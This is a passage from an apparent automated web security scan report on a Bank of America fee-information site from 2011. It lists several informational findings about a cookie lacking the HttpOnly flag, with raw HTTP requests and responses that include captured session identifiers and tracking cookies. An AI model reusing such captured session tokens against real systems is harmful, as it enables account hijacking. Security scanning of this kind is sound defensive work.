ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:28 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:54 GMT
ETag: "24c20b-1bb-4ab460c951580"
Accept-Ranges: bytes
Content-Length: 443
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:28 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

GIF89aT......................................................!.......,....T........I..8....`(.di.hZ*,..M,.tM.x..B....0h(...d2.`:.O.t..T...v.....0 L.....z.n....z,...x|.j.R.PM.LJ..FFCB?.;:5... . .. ,../
...[SNIP]...

4.18. http://factsaboutfees.bankofamerica.com/assets/img/bg_sitemap_btm.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_sitemap_btm.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_sitemap_btm.jpg HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:06 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1dc-369e-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 13982
Content-Type: image/jpeg
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/

......JFIF.....H.H....2.http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.2-c063 53.351735, 2008/07/22-
...[SNIP]...

4.19. http://factsaboutfees.bankofamerica.com/assets/img/bg_sitemap_center.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_sitemap_center.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_sitemap_center.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:06 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c20f-191c-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 6428
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:06 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/

GIF89aL....q............................................................................................................................................................................................
...[SNIP]...

4.20. http://factsaboutfees.bankofamerica.com/assets/img/bg_sitemap_corner_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_sitemap_corner_left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_sitemap_corner_left.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:06 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1f2-67-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 103
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:06 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/

GIF89a.......................................................!.......,...........p...9h..H.L.$M.,fI...;

4.21. http://factsaboutfees.bankofamerica.com/assets/img/bg_sitemap_corner_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_sitemap_corner_right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_sitemap_corner_right.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660; throttle_value=72

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:06 GMT
Server: Apache
Last-Modified: Wed, 24 Aug 2011 20:20:56 GMT
ETag: "24c1fb-68-4ab460cb39a00"
Accept-Ranges: bytes
Content-Length: 104
Cache-Control: max-age=3600
Expires: Thu, 06 Oct 2011 15:13:06 GMT
Content-Type: image/gif
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:06 GMT;path=/

GIF89a.......................................................!.......,................(...'..y.2zL..K..;

4.22. http://factsaboutfees.bankofamerica.com/assets/img/bg_tabPanel.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/assets/img/bg_tabPanel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:28 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/img/bg_tabPanel.gif HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/manage-credit-card-fees/transaction-fees-and-aprs/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 14:13:28 GMT
Server: Apache
